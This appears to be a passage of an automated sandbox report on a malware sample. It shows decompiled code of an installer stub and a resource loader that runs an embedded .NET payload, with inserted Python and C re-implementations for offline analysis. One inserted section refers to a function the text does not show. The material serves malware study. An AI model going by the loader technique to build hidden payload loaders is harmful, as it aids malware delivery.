            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0040253C(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
            				int _t5;
            				long _t7;
            				struct _OVERLAPPED* _t11;
            				intOrPtr* _t15;
            				void* _t17;
            				int _t21;
            
            				_t15 = __esi;
            				_t11 = __ebx;
            				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
            					_t7 = lstrlenA(E00402A9A(0x11));
            				} else {
            					E00402A7D(1);
            					 *0x40a018 = __al;
            				}
            				if( *_t15 == _t11) {
            					L8:
            					 *((intOrPtr*)(_t17 - 4)) = 1;
            				} else {
            					_t5 = WriteFile(E00405936(_t17 + 8, _t15), "C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll", _t7, _t17 + 8, _t11);
            					_t21 = _t5;
            					if(_t21 == 0) {
            						goto L8;
            					}
            				}
            				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t17 - 4));
            				return 0;
            			}

            • Instruction addresses: 0x0040253c, 0x0040253c, 0x0040253f, 0x0040255a, 0x00402541, 0x00402543, 0x00402548, 0x0040254f, 0x00402561, 0x004026da, 0x004026da, 0x00402567, 0x00402579, 0x004015c8, 0x004015ca, 0x00000000, 0x004015d0, 0x004015ca, 0x00402932, 0x0040293e

            APIs
            • lstrlenA.KERNEL32(00000000,00000011), ref: 0040255A
            • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll,00000000,?,?,00000000,00000011), ref: 00402579
            Strings
            • C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll, xrefs: 00402548, 0040256D
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: FileWritelstrlen
            • String ID: C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dll
            • API String ID: 427699356-4214189533
            • Opcode ID: 3d07f80d048e2c638fc755638a4a6850994cbad89dd1307057d881cba4918880
            • Instruction ID: abda26b523758e5a68d3ba22bbd8f990d4e7ca5ce812059aa2e21876e1d05e71
            • Opcode Fuzzy Hash: 3d07f80d048e2c638fc755638a4a6850994cbad89dd1307057d881cba4918880
            • Instruction Fuzzy Hash: EDF0E971A04244FED710EFA49D19AAF37649B11344F10443BB102F50C2D5BC4A455B6E
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00405513(char* _a4) {
            				char* _t3;
            				char* _t4;
            
            				_t4 = _a4;
            				_t3 =  &(_t4[lstrlenA(_t4)]);
            				while( *_t3 != 0x5c) {
            					_t3 = CharPrevA(_t4, _t3);
            					if(_t3 > _t4) {
            						continue;
            					}
            					break;
            				}
            				 *_t3 =  *_t3 & 0x00000000;
            				return _t3;
            			}

            • Instruction addresses: 0x00405514, 0x0040551e, 0x00405520, 0x00405527, 0x0040552f, 0x00000000, 0x00000000, 0x00000000, 0x0040552f, 0x00405531, 0x00405535

            APIs
            • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C9D,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405519
            • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C9D,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405527
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: CharPrevlstrlen
            • String ID: C:\Users\user\Desktop
            • API String ID: 2709904686-224404859
            • Opcode ID: 680019072755fb7b9246c28769c8d796fd5c75f8e8191a3aa30db9a90a6369eb
            • Instruction ID: 9a19af462094a1157adf0a1695e347c504c30875ce7c89a43b2e01bcf73e6b15
            • Opcode Fuzzy Hash: 680019072755fb7b9246c28769c8d796fd5c75f8e8191a3aa30db9a90a6369eb
            • Instruction Fuzzy Hash: 41D0A7B2409D706EE3031214DC04B8F7A488F17320F0904A2F040A61E5C2780C418BBD
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00405624(CHAR* _a4, CHAR* _a8) {
            				int _t10;
            				int _t15;
            				CHAR* _t16;
            
            				_t15 = lstrlenA(_a8);
            				_t16 = _a4;
            				while(lstrlenA(_t16) >= _t15) {
            					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
            					_t10 = lstrcmpiA(_t16, _a8);
            					if(_t10 == 0) {
            						return _t16;
            					}
            					_t16 = CharNextA(_t16);
            				}
            				return 0;
            			}

            • Instruction addresses: 0x00405630, 0x00405632, 0x0040565a, 0x0040563f, 0x00405644, 0x0040564f, 0x00000000, 0x0040566c, 0x00405658, 0x00405658, 0x00000000

            APIs
            • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040562B
            • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405644
            • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405652
            • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565B
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: lstrlen$CharNextlstrcmpi
            • String ID:
            • API String ID: 190613189-0
            • Opcode ID: f6e5a91ec7db47e15e60a1c150abbc6d75b5c44b2e203e3a2d493a33770f074b
            • Instruction ID: 467c7d4f976b1c4b769b407f61edba7cefb266b08e25db718ea0bc1606fb1982
            • Opcode Fuzzy Hash: f6e5a91ec7db47e15e60a1c150abbc6d75b5c44b2e203e3a2d493a33770f074b
            • Instruction Fuzzy Hash: 3DF0A736249D91AAC2126B359C04E6F7F94EF92325B68097AF444F2140D73A9C119BBB
            Uniqueness

            Uniqueness Score: -1.00%
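
Added example, not from the report and not code from the sample: the three NSIS installer-stub string helpers decompiled above (E0040555F, E00405513 and E00405624) re-implemented in Python, so the path handling the stub applies to its temp and plugin paths can be checked on real inputs. The function names are our own labels (the stub has no symbols), E004054F7 is assumed to be a strchr that returns a pointer to the terminating NUL on a miss (which is why the listing tests `*_t5 == 0` after each call), and the test paths are constructed after the strings shown in the xrefs.

```python
"""Added example (not part of the Joe Sandbox report, not the sample's code):
pure-Python re-implementations of three NSIS stub helpers, recovered from the
decompiled listings of E0040555F, E00405513 and E00405624. The names
skip_root, trim_to_parent and find_substring_nocase are our own labels."""

from typing import Optional


def skip_root(path: str) -> Optional[str]:
    """E0040555F: return the part of `path` after its root, or None.

    The listing compares the WORD at offset 1 with 0x5c3a (":\\") for drive
    paths and the WORD at offset 0 with 0x5c5c ("\\\\") for UNC paths; for
    UNC it then skips two more backslash-separated components (server and
    share). E004054F7 is assumed to be strchr returning a pointer to the NUL
    when the character is absent.
    """
    if len(path) >= 3 and path[1:3] == ":\\":
        return path[3:]                  # "C:\\dir\\f" -> "dir\\f"
    if not path.startswith("\\\\"):
        return None                      # no recognised root
    pos = 2
    for _ in range(2):                   # _t10 counts down from 2
        i = path.find("\\", pos)
        if i < 0:
            return None                  # hit the NUL before the share ended
        pos = i + 1
    return path[pos:]


def trim_to_parent(path: str) -> str:
    """E00405513: walk back from the end with CharPrevA until a backslash or
    the start of the buffer, then write a NUL there. The result is the parent
    directory; a string without any backslash becomes empty."""
    p = len(path)                        # start at the terminating NUL
    while p > 0 and (p == len(path) or path[p] != "\\"):
        p -= 1
    return path[:p]


def find_substring_nocase(haystack: str, needle: str) -> int:
    """E00405624: case-insensitive substring search, used by the stub when it
    looks for the "[Rename]" section. The listing NUL-terminates the haystack
    at len(needle) so lstrcmpiA compares only a prefix, then advances with
    CharNextA; this version keeps the prefix compare without touching the
    buffer and returns the index (-1 if absent). lstrcmpiA folds case per the
    user locale; .lower() is the ASCII approximation."""
    n = len(needle)
    folded = needle.lower()
    for i in range(len(haystack) - n + 1):
        if haystack[i:i + n].lower() == folded:
            return i
    return -1


if __name__ == "__main__":
    # Inputs modelled on strings visible in the report; all constructed.
    print(skip_root("C:\\Users\\user\\AppData\\Local\\Temp\\"))
    print(skip_root("\\\\srv\\share\\dir\\f.exe"), skip_root("\\\\srv\\share"))
    print(trim_to_parent("C:\\Users\\user\\Desktop"))
    print(find_substring_nocase("[rename]\r\nNUL=C:\\x.tmp\r\n", "[Rename]"))
```

The UNC branch is the one worth remembering when reading E0040555F: a share root with no trailing component ("\\srv\share") makes the second strchr run into the NUL and the function returns 0, so callers treat it as "no root" rather than an empty remainder.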

            Executed Functions

            C-Code - Quality: 100%
            			E00401489() {
            				void* _v8;
            				struct HRSRC__* _t4;
            				long _t10;
            				struct HRSRC__* _t12;
            				void* _t16;
            
            				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
            				_t12 = _t4;
            				if(_t12 == 0) {
            					L6:
            					ExitProcess(0);
            				}
            				_t16 = LoadResource(GetModuleHandleW(0), _t12);
            				if(_t16 != 0) {
            					_v8 = LockResource(_t16);
            					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
            					_t13 = _v8;
            					if(_v8 != 0 && _t10 != 0) {
            						L00401000(_t13, _t10); // executed
            					}
            				}
            				FreeResource(_t16);
            				goto L6;
            			}

            • Instruction addresses: 0x0040149f, 0x004014a5, 0x004014a9, 0x004014ec, 0x004014ee, 0x004014ee, 0x004014b7, 0x004014bb, 0x004014c7, 0x004014cd, 0x004014d3, 0x004014d8, 0x004014e0, 0x004014e0, 0x004014d8, 0x004014e6, 0x00000000

            APIs
            • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
            • FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
            • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
            • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
            • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
            • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
            • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD
              • Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037
            • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
            • ExitProcess.KERNEL32 ref: 004014EE
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
            • String ID: v4.0.30319
            • API String ID: 2372384083-3152434051
            • Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
            • Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
            • Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
            • Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679
            Uniqueness

            Uniqueness Score: -1.00%
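
Added example, not from the report and not the sample's code: E00401489 is the classic native loader shape, FindResourceW(GetModuleHandleW(0), 1, 0xa) (RT_RCDATA, integer id 1) followed by LoadResource/LockResource/SizeofResource, with the pointer and size handed to L00401000, whose CLRCreateInstance call and the "v4.0.30319" string indicate the blob is a .NET assembly run in a hosted CLR. The Python below reproduces that lookup over a raw .rsrc section so the payload can be carved from a dump offline, without executing the loader. The .rsrc blob, its RVA and the payload bytes are all constructed here; none are taken from the sample.

```python
"""Added example (not from the report, not the sample's code): offline
equivalent of FindResourceW(…, MAKEINTRESOURCE(1), RT_RCDATA) over a raw
.rsrc section, walking the type -> id -> language directory levels."""

import struct

RT_RCDATA = 10
RT_VERSION = 16
SUBDIR_FLAG = 0x80000000   # high bit of OffsetToData: entry points to a subdirectory
NAME_FLAG = 0x80000000     # high bit of Name: entry is a string name, not an integer id


def _read_dir(rsrc: bytes, off: int):
    """IMAGE_RESOURCE_DIRECTORY (16 bytes) followed by 8-byte entries."""
    n_named, n_ids = struct.unpack_from("<HH", rsrc, off + 12)
    entries = []
    for i in range(n_named + n_ids):
        ident, data = struct.unpack_from("<II", rsrc, off + 16 + 8 * i)
        entries.append((ident, data & 0x7FFFFFFF, bool(data & SUBDIR_FLAG)))
    return entries


def _pick(entries, wanted):
    """First integer-id entry equal to `wanted`, or the first id entry if wanted is None."""
    for ident, off, is_dir in entries:
        if ident & NAME_FLAG:
            continue
        if wanted is None or (ident & 0xFFFF) == wanted:
            return off, is_dir
    return None


def find_resource(rsrc: bytes, rsrc_rva: int, res_type: int, res_id: int, lang=None):
    """Raw bytes of resource (res_type, res_id[, lang]) or None. With lang=None the
    first language entry is used; real FindResourceW picks by thread UI language."""
    hit = _pick(_read_dir(rsrc, 0), res_type)
    if hit is None or not hit[1]:
        return None
    hit = _pick(_read_dir(rsrc, hit[0]), res_id)
    if hit is None or not hit[1]:
        return None
    hit = _pick(_read_dir(rsrc, hit[0]), lang)
    if hit is None or hit[1]:
        return None                       # expected an IMAGE_RESOURCE_DATA_ENTRY here
    data_rva, size = struct.unpack_from("<II", rsrc, hit[0])
    start = data_rva - rsrc_rva           # OffsetToData is an RVA, not a section offset
    if start < 0 or start + size > len(rsrc):
        return None                       # outside the section: corrupt or wrong base
    return rsrc[start:start + size]


def _dir(n_ids: int) -> bytes:
    return struct.pack("<IIHHHH", 0, 0, 0, 0, 0, n_ids)


def _entry(ident: int, off: int, is_dir: bool) -> bytes:
    return struct.pack("<II", ident, off | (SUBDIR_FLAG if is_dir else 0))


def build_sample_rsrc(rsrc_rva: int, rcdata: bytes, version: bytes) -> bytes:
    """Constructed .rsrc with RT_RCDATA/1/0x409 and RT_VERSION/1/0x409 (fixed layout)."""
    DIR_A, LANG_A, DATA_A = 0x20, 0x38, 0x50          # RCDATA branch offsets
    DIR_B, LANG_B, DATA_B = 0x60, 0x78, 0x90          # VERSION branch offsets
    PAYLOAD = 0xA0
    blob = bytearray()
    blob += _dir(2) + _entry(RT_RCDATA, DIR_A, True) + _entry(RT_VERSION, DIR_B, True)
    blob += _dir(1) + _entry(1, LANG_A, True)
    blob += _dir(1) + _entry(0x409, DATA_A, False)
    blob += struct.pack("<IIII", rsrc_rva + PAYLOAD, len(rcdata), 0, 0)
    blob += _dir(1) + _entry(1, LANG_B, True)
    blob += _dir(1) + _entry(0x409, DATA_B, False)
    blob += struct.pack("<IIII", rsrc_rva + PAYLOAD + len(rcdata), len(version), 0, 0)
    assert len(blob) == PAYLOAD
    return bytes(blob) + rcdata + version


SAMPLE_RSRC_RVA = 0x6000                              # assumed section RVA (constructed)
CONSTRUCTED_RCDATA = b"MZ" + bytes(range(62))         # stand-in for the embedded assembly
CONSTRUCTED_VERSION = b"VS_VERSION_INFO\x00"
SAMPLE_RSRC = build_sample_rsrc(SAMPLE_RSRC_RVA, CONSTRUCTED_RCDATA, CONSTRUCTED_VERSION)


def extract_rcdata_1(rsrc: bytes = SAMPLE_RSRC, rsrc_rva: int = SAMPLE_RSRC_RVA):
    """What E00401489 hands to L00401000: RT_RCDATA, integer id 1."""
    return find_resource(rsrc, rsrc_rva, RT_RCDATA, 1)


if __name__ == "__main__":
    blob = extract_rcdata_1()
    print(len(blob), blob[:2])
```

Against a real dump, pass the .rsrc section bytes and the section's VirtualAddress from the section header; a negative or out-of-range start is the usual sign that the wrong base was supplied or that the dump was taken after the directory was patched. The first two bytes of the carved blob should be MZ for the CLR-hosting path to make sense.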

            Memory Dump Source
            • Source File: 00000002.00000002.909443163.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4c966f292c9dd4d1353d0c71598efb139eb81479dfbb64927a84cbc5d290a171
            • Instruction ID: c7e1a84f6edefb2527a343997bac379b24ca46fac1c8148df2c2a5eb724c0494
            • Opcode Fuzzy Hash: 4c966f292c9dd4d1353d0c71598efb139eb81479dfbb64927a84cbc5d290a171
            • Instruction Fuzzy Hash: CDF14D34A00209CFDB14DFA9C944BADBBF2BF98304F1585A9E505AF3A1DB75E946CB40
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00401E1D() {
            				_Unknown_base(*)()* _t1;
            
            				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
            				return _t1;
            			}

            • Instruction addresses: 0x00401e22, 0x00401e28

            APIs
            • SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22
            Memory Dump Source
            • Source File: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: ExceptionFilterUnhandled
            • String ID:
            • API String ID: 3192549508-0
            • Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
            • Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
            • Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
            • Instruction Fuzzy Hash:
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetCurrentProcess.KERNEL32 ref: 022CB730
            • GetCurrentThread.KERNEL32 ref: 022CB76D
            • GetCurrentProcess.KERNEL32 ref: 022CB7AA
            • GetCurrentThreadId.KERNEL32 ref: 022CB803
            Memory Dump Source
            • Source File: 00000002.00000002.905582984.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
            Similarity
            • API ID: Current$ProcessThread
            • String ID:
            • API String ID: 2063062207-0
            • Opcode ID: dc4f878a6f844b8b8d07357ed4f5165f334a33c8536e9ea12812ae0419b7f556
            • Instruction ID: 244b5ae93fea961959f0720c469ededf4a162e3e83fe4c9394d2b74488c46a3f
            • Opcode Fuzzy Hash: dc4f878a6f844b8b8d07357ed4f5165f334a33c8536e9ea12812ae0419b7f556
            • Instruction Fuzzy Hash: 745174B49042498FDB10CFA9D588BDEFBF1EF49308F2085AAE459A7350C7355845CFA5
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetCurrentProcess.KERNEL32 ref: 022CB730
            • GetCurrentThread.KERNEL32 ref: 022CB76D
            • GetCurrentProcess.KERNEL32 ref: 022CB7AA
            • GetCurrentThreadId.KERNEL32 ref: 022CB803
            Memory Dump Source
            • Source File: 00000002.00000002.905582984.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
            Similarity
            • API ID: Current$ProcessThread
            • String ID:
            • API String ID: 2063062207-0
            • Opcode ID: 6519ff9532ec9cd8c0533e1873160da2f9f55d20a717bcf7b164d85dde454194
            • Instruction ID: cebdcb0fea825056f3f12ac6611dbb79af3b00807085dbd3f94490b0155116ce
            • Opcode Fuzzy Hash: 6519ff9532ec9cd8c0533e1873160da2f9f55d20a717bcf7b164d85dde454194
            • Instruction Fuzzy Hash: E15143B4E042498FDB10CFA9D588BDEFBF5EB89308F20856AE419A7350D7356844CF65
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            E004055C5(void* __ecx) {
                void* _t6;
                int _t12;          // byte size of the environment block (used below but left undeclared by the decompiler)
                void* _t14;
                void* _t18;
                WCHAR* _t19;

                _t14 = __ecx;
                _t19 = GetEnvironmentStringsW();   // double-NUL-terminated block of "NAME=value" wide strings
                if(_t19 != 0) {
                    // E0040558E(_t19) appears to walk to the end of the block; halving the
                    // distance and doubling it again yields the block size in bytes.
                    _t12 = (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1);
                    _t6 = E00403E3D(_t14, _t12); // executed: heap allocation, see E00403E3D below (same value as _t12)
                    _t18 = _t6;
                    if(_t18 != 0) {
                        E0040ACF0(_t18, _t19, _t12);   // copy _t12 bytes of the block into the private buffer
                    }
                    E00403E03(0);
                    FreeEnvironmentStringsW(_t19);     // release the system-owned block; the copy survives
                } else {
                    _t18 = 0;
                }
                return _t18;   // heap copy of the environment block, or 0 on failure
            }

            Instruction addresses (one per decompiled line, in listing order): 0x004055c5, 0x004055cf, 0x004055d3, 0x004055e4, 0x004055e8, 0x004055ed, 0x004055f3, 0x004055f8, 0x004055fd, 0x00405602, 0x00405609, 0x004055d5, 0x004055d5, 0x004055d5, 0x00405614

            APIs
            • GetEnvironmentStringsW.KERNEL32 ref: 004055C9
            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00405609
            Memory Dump Source
            • Source File: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: EnvironmentStrings$Free
            • String ID:
            • API String ID: 3328510275-0
            • Opcode ID: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
            • Instruction ID: c5c85d496f4b9afafe33008ffa5735024e7f647e2ae8fec8aafe46d04be69a25
            • Opcode Fuzzy Hash: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
            • Instruction Fuzzy Hash: E7E0E5371049206BD22127267C8AA6B2A1DCFC17B5765063BF809B61C2AE3D8E0208FD
            Uniqueness

            Uniqueness Score: -1.00%

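            The routine E004055C5 above is only readable once you know the layout it walks. As an added illustration (not code from the sample or from the report), the following portable C reproduces what the decompiled function does: size a double-NUL-terminated UTF-16 environment block, count its "NAME=value" entries, and take a private heap copy of it. The helper names (env_block_end, env_block_copy and so on) and the sample block are this page's own constructions; they stand in for E0040558E, E00403E3D and E0040ACF0, and the caller supplies the block instead of GetEnvironmentStringsW().

```c
/* Added illustration of E004055C5 in portable C; not the sample's own code.
 * A Windows environment block is a run of "NAME=value" UTF-16 strings, each
 * NUL-terminated, with one more NUL closing the block. Names are hypothetical. */
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Analogue of E0040558E: return a pointer one past the block's closing NUL. */
static const uint16_t *env_block_end(const uint16_t *block)
{
    const uint16_t *p = block;
    while (*p != 0) {              /* an empty string marks the end of the block */
        while (*p++ != 0) { }      /* skip one "NAME=value" string and its NUL */
    }
    return p + 1;                  /* step over the closing NUL */
}

/* Size in bytes of the whole block, closing NUL included (the value the
 * decompiled code computes as ((end - start) >> 1) * 2). */
size_t env_block_size_bytes(const uint16_t *block)
{
    return (size_t)(env_block_end(block) - block) * sizeof(uint16_t);
}

/* Number of "NAME=value" entries in the block. */
size_t env_block_count(const uint16_t *block)
{
    size_t n = 0;
    for (const uint16_t *p = block; *p != 0; ++n) {
        while (*p++ != 0) { }
    }
    return n;
}

/* Analogue of E004055C5: heap-allocate a private copy of the block.
 * malloc() stands in for E00403E3D, memcpy() for E0040ACF0. */
uint16_t *env_block_copy(const uint16_t *block)
{
    size_t bytes = env_block_size_bytes(block);
    uint16_t *copy = malloc(bytes);
    if (copy != NULL) {
        memcpy(copy, block, bytes);
    }
    return copy;                   /* NULL on allocation failure, like the sample's 0 */
}

/* Round-trip check: copy the block and compare it byte for byte. Returns 1 on success. */
int env_block_copy_roundtrip(const uint16_t *block)
{
    size_t bytes = env_block_size_bytes(block);
    uint16_t *copy = env_block_copy(block);
    int ok = (copy != NULL) && memcmp(copy, block, bytes) == 0;
    free(copy);
    return ok;
}

/* Constructed sample block (not captured from the sample): "A=1", "PATH=x", closing NUL. */
static const uint16_t sample_block[] = {
    'A', '=', '1', 0,
    'P', 'A', 'T', 'H', '=', 'x', 0,
    0
};

size_t sample_block_bytes(void)   { return env_block_size_bytes(sample_block); }
size_t sample_block_entries(void) { return env_block_count(sample_block); }
int    sample_block_roundtrip(void) { return env_block_copy_roundtrip(sample_block); }
```

            On the sample block this gives 24 bytes (12 UTF-16 code units) and 2 entries. Analysts dumping the copied buffer from the heap can use the same walk to recover NAME=value pairs from a memory dump.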
            Memory Dump Source
            • Source File: 00000002.00000002.909443163.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e23167ce3b3ec823f6bb8cad2710ed9ea0977d8040ba53910b3d6ce05e4b4044
            • Instruction ID: bc804d763c1491e2e10f6a058a428048ed79f5159d2a74f439c1f7cd4ff72db9
            • Opcode Fuzzy Hash: e23167ce3b3ec823f6bb8cad2710ed9ea0977d8040ba53910b3d6ce05e4b4044
            • Instruction Fuzzy Hash: 8A22C578E44205CFDB14CB94D488ABEBFB2FFA9310F1181DAD46267365C736A881CB51
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GetModuleHandleW.KERNELBASE(00000000), ref: 022C962E
            Memory Dump Source
            • Source File: 00000002.00000002.905582984.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
            Similarity
            • API ID: HandleModule
            • String ID:
            • API String ID: 4139908857-0
            • Opcode ID: 2bb5498728e1cd070441fd462e6bb5f4cdb7ef8a46855241c8d04d88a9acf7f1
            • Instruction ID: 7deafc3e0f2714026edb98f44b386c3d8a3174255e966f05da4d53e020463611
            • Opcode Fuzzy Hash: 2bb5498728e1cd070441fd462e6bb5f4cdb7ef8a46855241c8d04d88a9acf7f1
            • Instruction Fuzzy Hash: FE713570A10B058FDB24DF69C4457AAB7F1BF88304F208A2DD58AD7A44D775E84ACF91
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateActCtxA.KERNEL32(?), ref: 051C46B1
            Memory Dump Source
            • Source File: 00000002.00000002.909443163.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: Create
            • String ID:
            • API String ID: 2289755597-0
            • Opcode ID: 28b08bb9aa5cde6c1c758cc05dfe92dc48eb992361d678f85bb2b7f9cc28bb8e
            • Instruction ID: 4f82fe966d00ad780543c56d2fe11c18b181cf2b1be1e3e9c647c10d9829b2bc
            • Opcode Fuzzy Hash: 28b08bb9aa5cde6c1c758cc05dfe92dc48eb992361d678f85bb2b7f9cc28bb8e
            • Instruction Fuzzy Hash: E84132B1C04758CFEB20DFA9C8847DDBBB1BF58308F2480AAD509AB251D7B56946CF91
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 022CFD0A
            Memory Dump Source
            • Source File: 00000002.00000002.905582984.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
            Similarity
            • API ID: CreateWindow
            • String ID:
            • API String ID: 716092398-0
            • Opcode ID: 03b2d60f69f16afa4169fe8caeb792d651133f7e6d3917a44450784cfc9b3822
            • Instruction ID: 8e8c29507dc09713da45a2de2ceed7e1112682bbf2abde9bbd2b70e327d85660
            • Opcode Fuzzy Hash: 03b2d60f69f16afa4169fe8caeb792d651133f7e6d3917a44450784cfc9b3822
